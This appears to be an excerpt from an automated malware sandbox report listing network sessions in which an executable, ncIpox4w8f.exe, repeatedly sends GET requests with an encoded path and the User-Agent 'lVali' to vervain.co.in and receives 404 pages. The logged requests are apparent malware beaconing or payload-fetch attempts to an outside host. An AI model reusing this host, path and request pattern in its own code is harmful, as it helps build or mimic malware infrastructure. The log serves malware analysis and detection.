                2022-08-05 13:09:48 UTC | 54 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:48 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:48 UTC | 54 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                57 | 192.168.2.4 | 49833 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:49 UTC | 54 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:50 UTC | 55 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:49 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:50 UTC | 55 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                58 | 192.168.2.4 | 49834 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:50 UTC | 55 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:51 UTC | 56 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:51 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:51 UTC | 56 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                59 | 192.168.2.4 | 49835 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:51 UTC | 56 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:52 UTC | 57 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:52 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:52 UTC | 57 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                6 | 192.168.2.4 | 49761 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:29 UTC | 5 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:29 UTC | 5 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:29 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:29 UTC | 6 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                60 | 192.168.2.4 | 49836 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:53 UTC | 57 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:53 UTC | 58 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:53 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:53 UTC | 58 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                61 | 192.168.2.4 | 49837 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:54 UTC | 58 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:54 UTC | 58 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:54 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:54 UTC | 59 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                62 | 192.168.2.4 | 49838 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:55 UTC | 59 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:55 UTC | 59 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:55 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:55 UTC | 60 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                63 | 192.168.2.4 | 49839 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:56 UTC | 60 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:56 UTC | 60 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:56 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:56 UTC | 61 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                64 | 192.168.2.4 | 49841 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:57 UTC | 61 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:57 UTC | 61 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:57 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:57 UTC | 62 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                65 | 192.168.2.4 | 49842 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:58 UTC | 62 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:59 UTC | 62 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:58 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:59 UTC | 63 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                66 | 192.168.2.4 | 49843 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:59 UTC | 63 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:00 UTC | 63 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:00 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:00 UTC | 64 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                67 | 192.168.2.4 | 49844 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:10:00 UTC | 64 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:01 UTC | 64 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:01 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:01 UTC | 65 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                68 | 192.168.2.4 | 49845 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:10:02 UTC | 65 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:02 UTC | 65 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:02 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:02 UTC | 66 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                69 | 192.168.2.4 | 49846 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:10:03 UTC | 66 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:03 UTC | 66 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:03 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:03 UTC | 66 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                7 | 192.168.2.4 | 49762 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:30 UTC | 6 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:30 UTC | 6 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:30 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:30 UTC | 7 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                70 | 192.168.2.4 | 49847 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:10:04 UTC | 67 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:04 UTC | 67 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:04 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:04 UTC | 67 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                71 | 192.168.2.4 | 49848 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:10:05 UTC | 68 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:05 UTC | 68 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:05 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:05 UTC | 68 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                72 | 192.168.2.4 | 49849 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:10:06 UTC | 69 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:07 UTC | 69 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:06 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:07 UTC | 69 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                73 | 192.168.2.4 | 49850 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:10:07 UTC | 70 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:08 UTC | 70 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:08 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:08 UTC | 70 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                74 | 192.168.2.4 | 49852 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:10:09 UTC | 71 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:09 UTC | 71 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:09 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:09 UTC | 71 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                75 | 192.168.2.4 | 49853 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:10:09 UTC | 72 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:10 UTC | 72 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:10 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:10 UTC | 72 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                76 | 192.168.2.4 | 49854 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:10:11 UTC | 73 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:11 UTC | 73 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:11 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:11 UTC | 73 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                77 | 192.168.2.4 | 49855 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:10:12 UTC | 74 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:12 UTC | 74 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:12 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:12 UTC | 74 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                78 | 192.168.2.4 | 49856 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:10:13 UTC | 75 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:13 UTC | 75 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:13 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:13 UTC | 75 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                79 | 192.168.2.4 | 49857 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:10:14 UTC | 76 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:14 UTC | 76 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:14 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:14 UTC | 76 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                8 | 192.168.2.4 | 49763 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:31 UTC | 7 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:31 UTC | 7 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:31 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:31 UTC | 8 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                80 | 192.168.2.4 | 49858 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:10:15 UTC | 77 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:15 UTC | 77 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:15 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
